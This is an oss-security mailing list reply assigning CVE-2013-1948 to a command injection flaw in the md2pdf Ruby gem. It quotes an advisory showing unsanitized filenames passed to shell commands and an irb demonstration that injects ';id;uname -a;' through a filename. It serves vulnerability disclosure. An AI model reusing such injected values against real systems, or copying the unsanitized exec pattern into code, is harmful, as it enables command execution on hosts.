Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Sat, 13 Apr 2013 01:45:30 -0600
From: Kurt Seifried <kseifried@...hat.com>
To: oss-security@...ts.openwall.com
CC: "Larry W. Cashdollar" <larry0@...com>
Subject: Re: Remote command injection md2pdf ruby gem

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 04/12/2013 08:09 PM, Larry W. Cashdollar wrote:
> 
> Remote command injection md2pdf ruby gem
> 
> /4/10/2013/ 
> ------------------------------------------------------------------------
>
>  Description: "creates pdf documents from markdown documents"
> 
> https://rubygems.org/gems/md2pdf
> 
> In md2pdf/converter.rb we see user supplied input being passed to
> the command line with out proper sanitization.
> 
> 12       shell.exec("pandoc#{options} #{input_filename} -o
> #{output_filename}")
> 
> 23 shell.exec("pdftk #{temp_filename} multibackground
> #{background_path} outpu t #{output_filename}")
> 
> Where exec is defined as the following:
> 
> 37     def exec(command_line) 38       require 'open3' 39
> stdin, stdout, stderr = Open3.popen3(command_line) 40       return
> stdout.read 41     end
> 
> 
> Notes
> 
> irb(main):001:0> require 'open3' => true irb(main):002:0> stdin,
> stdout, stderr = Open3.popen3('pdfcnv filename;id;uname -a;.pdft') 
> => [#, #, #] irb(main):003:0> puts stdout.read uid=1000(larry)
> gid=1000(larry)
> groups=1000(larry),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),117(sambashare)
>
> 
Linux underfl0w 3.2.0-39-virtual #62-Ubuntu SMP Wed Feb 27 22:45:45 UTC
2013 i686 athlon i386 GNU/Linux
> => nil
> 
> http://vapid.dhs.org/advisories/md2pdf-remote-exec.html
> 
> This vulnerability doesn't have a CVE yet assigned.
> 
> Larry W. Cashdollar @_larry0

Please use CVE-2013-1948 for this issue.



- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)

iQIcBAEBAgAGBQJRaQ0ZAAoJEBYNRVNeJnmTN0YP/2/mIM5QppooHJ77lM7OvZCt
N5u45ZMY/jQPndbUozU/r+LXXpEzmxVtMZDGft1j7kQVsRs+eP5ZCqmQM2Yw9wZT
JYlVsFnxLgauyVcXnLZD40V8BhditXH0UWuE6vy21i+5daWQCVkLXWIZkK32QRn2
jK6bWpFF3uwozHwbf78F+GMiBRpKp2+GyU6pWnb84REMI1LYESIAEBPA8+db5efA
hTwPiMUCSEEJIzJhKJIIXNE3/cu0v/YJk5ePx8ZdoU8Po5gti5ZCZavZqO8TM9Lq
JBamkbJz+5WCwK9wAskTY5kwIBh4LT6Onu8jhwC4hmDfB+Vf3ljiLgjrKmmU1I9S
1po8t9FErWxe9WtZt41PM39awcUkVZArcLABmg4hgX734dLaGJAwBp5JY7Hu4YUm
h+lzTP+kIulQ4GnGbf+iZKL4SUvR0SQ0fw/S6i8mt6sK5xKOpfovzPYDTDokQOK0
69vB5duevww6zFdMMc6TDW9dhqi1yhSE8cfugYwdRRR/jUudC4kQE3Z9rbBL8xH2
OPWGbRLNROzr1rjO2/DE6Eb+SQ6e7IPlBmsDaJDh7botroiIqFWFr6r5PQizSYdq
YsIKuWPXiF/1SRZonTnl1xji7P4zmdrbgHPLaxxzCMjVaALgtnuoCBV1vmAZyKdy
Bgh9OPv7pNBHdjhvXtp2
=mj6w
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.